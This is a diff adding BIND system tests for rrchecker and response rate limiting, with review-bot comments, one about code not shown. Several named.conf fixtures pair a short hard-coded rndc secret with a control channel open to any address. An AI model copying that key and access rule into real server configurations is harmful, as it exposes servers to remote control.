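Review bot: The option string `"xS:"` near the top of rpzrecurse/tests.sh tells getopts that `-S` takes an argument, but the `S)` arm never reads `$OPTARG` and treats it as a flag, and the usage text advertises `[-xS]`. As written, `tests.sh -S -x` consumes `-x` as the argument of `-S` and tracing is never enabled. Dropping the colon, `while getopts "xS" c; do`, matches the handler and the usage string. A smaller point in the Group 6 block: ns1 is suspended with `$KILL -STOP $PID` and only resumed further down, while `trap 'exit 1' 1 2 15` does not send `-CONT`, so an interrupted run can leave the authority server stopped.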
@@ -0,0 +1,15 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f classlist.out privatelist.out typelist.out tempzone checkzone.out* checker.out +rm -f ns*/named.lock diff --git a/bin/tests/system/rrchecker/privatelist.good b/bin/tests/system/rrchecker/privatelist.good new file mode 100644 index 0000000..e69de29 --- /dev/null +++ b/bin/tests/system/rrchecker/privatelist.good diff --git a/bin/tests/system/rrchecker/tests.sh b/bin/tests/system/rrchecker/tests.sh new file mode 100644 index 0000000..7990e65 --- /dev/null +++ b/bin/tests/system/rrchecker/tests.sh 
@@ -0,0 +1,84 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "class list ($n)" +$RRCHECKER -C > classlist.out +$DIFF classlist.out classlist.good || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "type list ($n)" +$RRCHECKER -T > typelist.out +$DIFF typelist.out typelist.good || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "private type list ($n)" +$RRCHECKER -P > privatelist.out +$DIFF privatelist.out privatelist.good || { echo_i "failed"; status=`expr $status + 1`; } + +myecho() { +cat << EOF +$* +EOF +} + +n=`expr $n + 1` +echo_i "check conversions to canonical format ($n)" +ret=0 +$SHELL ../genzone.sh 0 > tempzone +$CHECKZONE -Dq . tempzone | sed '/^;/d' > checkzone.out$n +while read -r name tt cl ty rest +do + myecho "$cl $ty $rest" | $RRCHECKER -p > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not handled." + } + read -r cl0 ty0 rest0 < checker.out + test "$cl $ty $rest" = "$cl0 $ty0 $rest0" || { + ret=1 + echo_i "'$cl $ty $rest' != '$cl0 $ty0 $rest0'" + } +done < checkzone.out$n +test $ret -eq 0 || { echo_i "failed"; status=`expr $status + 1`; } + +n=`expr $n + 1` +echo_i "check conversions to and from unknown record format ($n)" +ret=0 +$CHECKZONE -Dq . 
tempzone | sed '/^;/d' > checkzone.out$n +while read -r name tt cl ty rest +do + myecho "$cl $ty $rest" | $RRCHECKER -u > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not converted to unknown record format" + } + read -r clu tyu restu < checker.out + myecho "$clu $tyu $restu" | $RRCHECKER -p > checker.out || { + ret=1 + echo_i "'$cl $ty $rest' not converted back to canonical format" + } + read -r cl0 ty0 rest0 < checker.out + test "$cl $ty $rest" = "$cl0 $ty0 $rest0" || { + ret=1 + echo_i "'$cl $ty $rest' != '$cl0 $ty0 $rest0'" + } +done < checkzone.out$n +test $ret -eq 0 || { echo_i "failed"; status=`expr $status + 1`; } + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrchecker/typelist.good b/bin/tests/system/rrchecker/typelist.good new file mode 100644 index 0000000..3c3e5cd --- /dev/null +++ b/bin/tests/system/rrchecker/typelist.good @@ -0,0 +1,81 @@ +A +NS +MD +MF +CNAME +SOA +MB +MG +MR +NULL +WKS +PTR +HINFO +MINFO +MX +TXT +RP +AFSDB +X25 +ISDN +RT +NSAP +NSAP-PTR +SIG +KEY +PX +GPOS +AAAA +LOC +NXT +EID +NIMLOC +SRV +ATMA +NAPTR +KX +CERT +A6 +DNAME +SINK +APL +DS +SSHFP +IPSECKEY +RRSIG +NSEC +DNSKEY +DHCID +NSEC3 +NSEC3PARAM +TLSA +SMIMEA +HIP +NINFO +RKEY +TALINK +CDS +CDNSKEY +OPENPGPKEY +CSYNC +ZONEMD +SVCB +HTTPS +SPF +UINFO +UID +GID +UNSPEC +NID +L32 +L64 +LP +EUI48 +EUI64 +URI +CAA +AVC +DOA +AMTRELAY +TA +DLV diff --git a/bin/tests/system/rrl/broken.conf.in b/bin/tests/system/rrl/broken.conf.in new file mode 100644 index 0000000..020542c --- /dev/null +++ b/bin/tests/system/rrl/broken.conf.in 
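Review bot: Both conversion loops read `checkzone.out$n` without checking that it holds any records, so the test can pass without ever running `$RRCHECKER`. If `genzone.sh` or `$CHECKZONE` fails (the exit status of `$CHECKZONE` is lost behind the `sed` pipe), the `while read` body never runs and `ret` stays 0. Adding `test -s checkzone.out$n || { ret=1; echo_i "no records to check"; }` before each loop would turn that case into a failure. A smaller point: when `$RRCHECKER -p` fails, the following `read … < checker.out` still compares the empty or partial output, so one bad record is reported twice.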
@@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + notify no; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + log-only yes; + + min-table-size 0; + max-table-size 0; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + diff --git a/bin/tests/system/rrl/clean.sh b/bin/tests/system/rrl/clean.sh new file mode 100644 index 0000000..739366a --- /dev/null +++ b/bin/tests/system/rrl/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Clean up after rrl tests. + +rm -f dig.out* *mdig.out* +rm -f */named.memstats */named.run */named.stats */log-* */session.key +rm -f ns3/bl*.db */*.jnl */*.core */*.pid +rm -f ns*/named.lock +rm -f ns*/named.conf +rm -f broken.conf +rm -f broken.out +rm -f ns*/managed-keys.bind* 
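Review bot: The `key rndc_key` block carries a short fixed secret (`"1234abcd8765"`) and the `controls` statement uses `allow { any; }`, yet nothing in the file marks this as acceptable only because it is a test fixture. The same key and ACL are repeated in `rrl/ns2/named.conf.in` and `rrl/ns4/named.conf.in`. A comment above the key, for example `/* test-only key; the control channel is bound to the 10.53.0.x test address and must not be reused in a deployed named.conf */`, would keep the block from being copied as a template. The file also opens with `controls { /* empty */ };` and later declares a second `controls` with an `inet` listener, which reads as contradictory; a comment saying which one is intended, or dropping the empty statement, would help.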
diff --git a/bin/tests/system/rrl/ns1/named.conf.in b/bin/tests/system/rrl/ns1/named.conf.in new file mode 100644 index 0000000..e4da6ef --- /dev/null +++ b/bin/tests/system/rrl/ns1/named.conf.in @@ -0,0 +1,28 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; +}; + +zone "." {type primary; file "root.db";}; diff --git a/bin/tests/system/rrl/ns1/root.db b/bin/tests/system/rrl/ns1/root.db new file mode 100644 index 0000000..68265fe --- /dev/null +++ b/bin/tests/system/rrl/ns1/root.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns. hostmaster.ns. ( 1 3600 1200 604800 60 ) +@ NS ns. +ns. A 10.53.0.1 +. A 10.53.0.1 + +; limit responses from here +tld2. NS ns.tld2. +ns.tld2. A 10.53.0.2 + +; limit recursion to here +tld3. NS ns.tld3. +ns.tld3. A 10.53.0.3 + +; generate SERVFAIL +tld4. NS ns.tld3. 
diff --git a/bin/tests/system/rrl/ns2/hints b/bin/tests/system/rrl/ns2/hints
new file mode 100644
index 0000000..a1d435e
--- /dev/null
+++ b/bin/tests/system/rrl/ns2/hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 0 NS ns1.
+ns1. 0 A 10.53.0.1
diff --git a/bin/tests/system/rrl/ns2/named.conf.in b/bin/tests/system/rrl/ns2/named.conf.in
new file mode 100644
index 0000000..987d42f
--- /dev/null
+++ b/bin/tests/system/rrl/ns2/named.conf.in
@@ -0,0 +1,65 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + + // small enough to force a table expansion + min-table-size 75; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* + * These log settings have no effect unless "-g" is removed from ../../start.pl + */ +logging { + channel debug { + file "log-debug"; + print-category yes; print-severity yes; severity debug 10; + }; + channel queries { + file "log-queries"; + print-category yes; print-severity yes; severity info; + }; + category rate-limit { debug; queries; }; + category queries { debug; queries; }; +}; + +zone "." { type hint; file "hints"; }; + +zone "tld2."{ type primary; file "tld2.db"; }; diff --git a/bin/tests/system/rrl/ns2/tld2.db b/bin/tests/system/rrl/ns2/tld2.db new file mode 100644 index 0000000..a1a832b --- /dev/null +++ b/bin/tests/system/rrl/ns2/tld2.db 
@@ -0,0 +1,42 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld2. hostmaster.ns.tld2. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.2 + +; basic rate limiting +a1 A 192.0.2.1 + +; wildcards +*.a2 A 192.0.2.2 + +; a3 is in tld3 + +; a4 does not exist to give NXDOMAIN + +; a5 for TCP requests +a5 A 192.0.2.5 + +; a6 for whitelisted clients +a6 A 192.0.2.6 + +; a7 for SERVFAIL + +; a8 for NODATA +a8 A 192.0.2.8 + +; a9 for all-per-second limit +$GENERATE 101-180 all$.a9 A 192.0.2.8 diff --git a/bin/tests/system/rrl/ns3/hints b/bin/tests/system/rrl/ns3/hints new file mode 100644 index 0000000..a1d435e --- /dev/null +++ b/bin/tests/system/rrl/ns3/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 0 NS ns1. +ns1. 0 A 10.53.0.1 diff --git a/bin/tests/system/rrl/ns3/named.conf.in b/bin/tests/system/rrl/ns3/named.conf.in new file mode 100644 index 0000000..8807f44 --- /dev/null +++ b/bin/tests/system/rrl/ns3/named.conf.in 
@@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + + // check that all of the options are parsed without limiting anything + rate-limit { + responses-per-second 200; + referrals-per-second 220; + nodata-per-second 230; + nxdomains-per-second 240; + errors-per-second 250; + all-per-second 700; + ipv4-prefix-length 24; + ipv6-prefix-length 64; + qps-scale 10; + window 1; + max-table-size 1000; + log-only no; + min-table-size 0; + }; + +}; + +zone "." { type hint; file "hints"; }; + +zone "tld3."{ type primary; file "tld3.db"; }; diff --git a/bin/tests/system/rrl/ns3/tld3.db b/bin/tests/system/rrl/ns3/tld3.db new file mode 100644 index 0000000..a534c6e --- /dev/null +++ b/bin/tests/system/rrl/ns3/tld3.db 
@@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld3. hostmaster.ns.tld3. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.3 + +*.a3 A 192.0.3.3 diff --git a/bin/tests/system/rrl/ns4/hints b/bin/tests/system/rrl/ns4/hints new file mode 100644 index 0000000..a1d435e --- /dev/null +++ b/bin/tests/system/rrl/ns4/hints @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 0 NS ns1. +ns1. 0 A 10.53.0.1 diff --git a/bin/tests/system/rrl/ns4/named.conf.in b/bin/tests/system/rrl/ns4/named.conf.in new file mode 100644 index 0000000..cc17b91 --- /dev/null +++ b/bin/tests/system/rrl/ns4/named.conf.in 
@@ -0,0 +1,67 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + session-keyfile "session.key"; + pid-file "named.pid"; + statistics-file "named.stats"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + notify no; + recursion yes; + dnssec-validation yes; + max-udp-size 4096; + + rate-limit { + responses-per-second 2; + all-per-second 50; + slip 3; + exempt-clients { 10.53.0.7; }; + log-only yes; + + // small enough to force a table expansion + min-table-size 75; + }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +/* + * These log settings have no effect unless "-g" is removed from ../../start.pl + */ +logging { + channel debug { + file "log-debug"; + print-category yes; print-severity yes; severity debug 10; + }; + channel queries { + file "log-queries"; + print-category yes; print-severity yes; severity info; + }; + category rate-limit { debug; queries; }; + category queries { debug; queries; }; +}; + +zone "." { type hint; file "hints"; }; + +zone "tld4."{ type primary; file "tld4.db"; }; diff --git a/bin/tests/system/rrl/ns4/tld4.db b/bin/tests/system/rrl/ns4/tld4.db new file mode 100644 index 0000000..a7bc319 --- /dev/null +++ b/bin/tests/system/rrl/ns4/tld4.db 
@@ -0,0 +1,45 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; rate limit response from this zone + +$TTL 120 +@ SOA tld4. hostmaster.ns.tld4. ( 1 3600 1200 604800 60 ) + NS ns + NS . +ns A 10.53.0.2 + +; basic rate limiting +a1 A 192.0.2.1 + +; wildcards +*.a2 A 192.0.2.2 + +; a3 is in tld3 + +; a4 does not exist to give NXDOMAIN + +; a5 for TCP requests +a5 A 192.0.2.5 + +; a6 for whitelisted clients +a6 A 192.0.2.6 + +; a7 for SERVFAIL + +; a8 for NODATA +a8 A 192.0.2.8 + +; a9 for all-per-second limit +$GENERATE 101-180 all$.a9 A 192.0.2.8 + +; oversized TXT record +$GENERATE 1-100 big 1 TXT "txt$" diff --git a/bin/tests/system/rrl/setup.sh b/bin/tests/system/rrl/setup.sh new file mode 100644 index 0000000..be63ed9 --- /dev/null +++ b/bin/tests/system/rrl/setup.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports broken.conf.in broken.conf +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf 
diff --git a/bin/tests/system/rrl/tests.sh b/bin/tests/system/rrl/tests.sh
new file mode 100644
index 0000000..d4d2a83
--- /dev/null
+++ b/bin/tests/system/rrl/tests.sh
@@ -0,0 +1,291 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test response rate limiting + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +#set -x + +ns1=10.53.0.1 # root, defining the others +ns2=10.53.0.2 # test server +ns3=10.53.0.3 # secondary test server +ns4=10.53.0.4 # log-only test server +ns7=10.53.0.7 # whitelisted client + +USAGE="$0: [-x]" +while getopts "x" c; do + case $c in + x) set -x;; + *) echo "$USAGE" 1>&2; exit 1;; + esac +done +shift `expr $OPTIND - 1 || true` +if test "$#" -ne 0; then + echo "$USAGE" 1>&2 + exit 1 +fi +# really quit on control-C +trap 'exit 1' 1 2 15 + + +ret=0 +setret () { + ret=1 + echo_i "$*" +} + + +# Wait until soon after the start of a second to make results consistent. +# The start of a second credits a rate limit. +# This would be far easier in C or by assuming a modern version of perl. 
+sec_start () { + START=`date` + while true; do + NOW=`date` + if test "$START" != "$NOW"; then + return + fi + $PERL -e 'select(undef, undef, undef, 0.05)' || true + done +} + + +# turn off ${HOME}/.digrc +HOME=/dev/null; export HOME + +# $1=number of tests $2=target domain $3=dig options +QNUM=1 +burst () { + BURST_LIMIT=$1; shift + BURST_DOM_BASE="$1"; shift + + XCNT=$CNT + CNT='XXX' + eval FILENAME="mdig.out-$BURST_DOM_BASE" + CNT=$XCNT + + DOMS="" + CNTS=`$PERL -e 'for ( $i = 0; $i < '$BURST_LIMIT'; $i++) { printf "%03d\n", '$QNUM' + $i; }'` + for CNT in $CNTS + do + eval BURST_DOM="$BURST_DOM_BASE" + DOMS="$DOMS $BURST_DOM" + done + ARGS="+burst +nocookie +continue +time=1 +tries=1 -p ${PORT} $* @$ns2 $DOMS" + $MDIG $ARGS 2>&1 | \ + tr -d '\r' | \ + tee -a full-$FILENAME | \ + sed -n -e '/^;; AUTHORITY/,/^$/d' \ + -e '/^;; ADDITIONAL/,/^$/d' \ + -e 's/^[^;].* \([^ ]\{1,\}\)$/\1/p' \ + -e 's/;; flags.* tc .*/TC/p' \ + -e 's/;; .* status: NXDOMAIN.*/NXDOMAIN/p' \ + -e 's/;; .* status: NOERROR.*/NOERROR/p' \ + -e 's/;; .* status: SERVFAIL.*/SERVFAIL/p' \ + -e 's/response failed with timed out.*/drop/p' \ + -e 's/;; communications error to.*/drop/p' >> $FILENAME & + QNUM=`expr $QNUM + $BURST_LIMIT` +} + +# compare integers $1 and $2; ensure the difference is no more than $3 +range () { + $PERL -e 'if (abs(int($ARGV[0]) - int($ARGV[1])) > int($ARGV[2])) { exit(1) }' $1 $2 $3 +} + +# $1=domain $2=IP address $3=# of IP addresses $4=TC $5=drop +# $6=NXDOMAIN $7=SERVFAIL or other errors +ck_result() { + # wait to the background mdig calls to complete. 
+ wait + BAD=no + ADDRS=`grep -E "^$2$" mdig.out-$1 2>/dev/null | wc -l` + # count simple truncated and truncated NXDOMAIN as TC + TC=`grep -E "^TC|NXDOMAINTC$" mdig.out-$1 2>/dev/null | wc -l` + DROP=`grep -E "^drop$" mdig.out-$1 2>/dev/null | wc -l` + # count NXDOMAIN and truncated NXDOMAIN as NXDOMAIN + NXDOMAIN=`grep -E "^NXDOMAIN|NXDOMAINTC$" mdig.out-$1 2>/dev/null | wc -l` + SERVFAIL=`grep -E "^SERVFAIL$" mdig.out-$1 2>/dev/null | wc -l` + NOERROR=`grep -E "^NOERROR$" mdig.out-$1 2>/dev/null | wc -l` + + range $ADDRS "$3" 1 || + setret "$ADDRS instead of $3 '$2' responses for $1" && + BAD=yes + + range $TC "$4" 1 || + setret "$TC instead of $4 truncation responses for $1" && + BAD=yes + + range $DROP "$5" 1 || + setret "$DROP instead of $5 dropped responses for $1" && + BAD=yes + + range $NXDOMAIN "$6" 1 || + setret "$NXDOMAIN instead of $6 NXDOMAIN responses for $1" && + BAD=yes + + range $SERVFAIL "$7" 1 || + setret "$SERVFAIL instead of $7 error responses for $1" && + BAD=yes + + range $NOERROR "$8" 1 || + setret "$NOERROR instead of $8 NOERROR responses for $1" && + BAD=yes + + if test -z "$BAD"; then + rm -f mdig.out-$1 + fi +} + + +ckstats () { + LABEL="$1"; shift + TYPE="$1"; shift + EXPECTED="$1"; shift + C=`tr -d '\r' < ns2/named.stats | + sed -n -e "s/[ ]*\([0-9]*\).responses $TYPE for rate limits.*/\1/p" | + tail -1` + C=`expr 0$C + 0` + + range "$C" $EXPECTED 1 || + setret "wrong $LABEL $TYPE statistics of $C instead of $EXPECTED" +} + + +######### +sec_start + +# Tests of referrals to "." must be done before the hints are loaded +# or with "additional-from-cache no" +burst 5 a1.tld3 +norec +# basic rate limiting +burst 3 a1.tld2 +# delay allows an additional response. +sleep 1 +burst 10 a1.tld2 +# Request 30 different qnames to try a wildcard. +burst 30 'y.x$CNT.a2.tld2' + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# referrals to "." 
+ck_result a1.tld3 x 0 1 2 0 0 2 +# check 13 results including 1 second delay that allows an additional response +ck_result a1.tld2 192.0.2.1 3 4 6 0 0 8 + +# Check the wildcard answers. +# The zone origin name of the 30 requests is counted. +ck_result 'y.x*.a2.tld2' 192.0.2.2 2 10 18 0 0 12 + +######### +sec_start + +burst 10 'x.a3.tld3' +burst 10 'y$CNT.a3.tld3' +burst 10 'z$CNT.a4.tld2' + +# 10 identical recursive responses are limited +ck_result 'x.a3.tld3' 192.0.3.3 2 3 5 0 0 5 + +# 10 different recursive responses are not limited +ck_result 'y*.a3.tld3' 192.0.3.3 10 0 0 0 0 10 + +# 10 different NXDOMAIN responses are limited based on the parent name. +# We count 13 responses because we count truncated NXDOMAIN responses +# as both truncated and NXDOMAIN. +ck_result 'z*.a4.tld2' x 0 3 5 5 0 0 + +$RNDCCMD $ns2 stats +ckstats first dropped 36 +ckstats first truncated 21 + + +######### +sec_start + +burst 10 a5.tld2 +tcp +burst 10 a6.tld2 -b $ns7 +burst 10 a7.tld4 +burst 2 a8.tld2 -t AAAA +burst 2 a8.tld2 -t TXT +burst 2 a8.tld2 -t SPF + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# TCP responses are not rate limited +ck_result a5.tld2 192.0.2.5 10 0 0 0 0 10 + +# whitelisted client is not rate limited +ck_result a6.tld2 192.0.2.6 10 0 0 0 0 10 + +# Errors such as SERVFAIL are rate limited. +ck_result a7.tld4 x 0 0 8 0 2 0 + +# NODATA responses are counted as the same regardless of qtype. +ck_result a8.tld2 x 0 2 2 0 0 4 + +$RNDCCMD $ns2 stats +ckstats second dropped 46 +ckstats second truncated 23 + + +######### +sec_start + +# IP TC drop NXDOMAIN SERVFAIL NOERROR +# all-per-second +# The qnames are all unique but the client IP address is constant. 
+QNUM=101 +burst 60 'all$CNT.a9.tld2' + +ck_result 'a*.a9.tld2' 192.0.2.8 50 0 10 0 0 50 + +$RNDCCMD $ns2 stats +ckstats final dropped 56 +ckstats final truncated 23 + +######### +sec_start + +DIGOPTS="+nocookie +nosearch +time=1 +tries=1 +ignore -p ${PORT}" +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 +$DIG $DIGOPTS @$ns4 A a7.tld4 > /dev/null 2>&1 + +# regression test for GL #2839 +DIGOPTS="+bufsize=4096 +ignore -p ${PORT}" +$DIG $DIGOPTS @$ns4 TXT big.tld4 > /dev/null 2>&1 + +grep "would limit" ns4/named.run >/dev/null 2>&1 || +setret "\"would limit\" not found in log file." + +$NAMED -D rrl-ns5 -gc broken.conf > broken.out 2>&1 & +sleep 2 +grep "min-table-size 1" broken.out > /dev/null || setret "min-table-size 0 was not changed to 1" + +if [ -f named.pid ]; then + $KILL `cat named.pid` + setret "named should not have started, but did" +fi + +echo_i "exit status: $ret" +[ $ret -eq 0 ] || exit 1 diff --git a/bin/tests/system/rrsetorder/clean.sh b/bin/tests/system/rrsetorder/clean.sh new file mode 100644 index 0000000..c64ae34 --- /dev/null +++ b/bin/tests/system/rrsetorder/clean.sh 
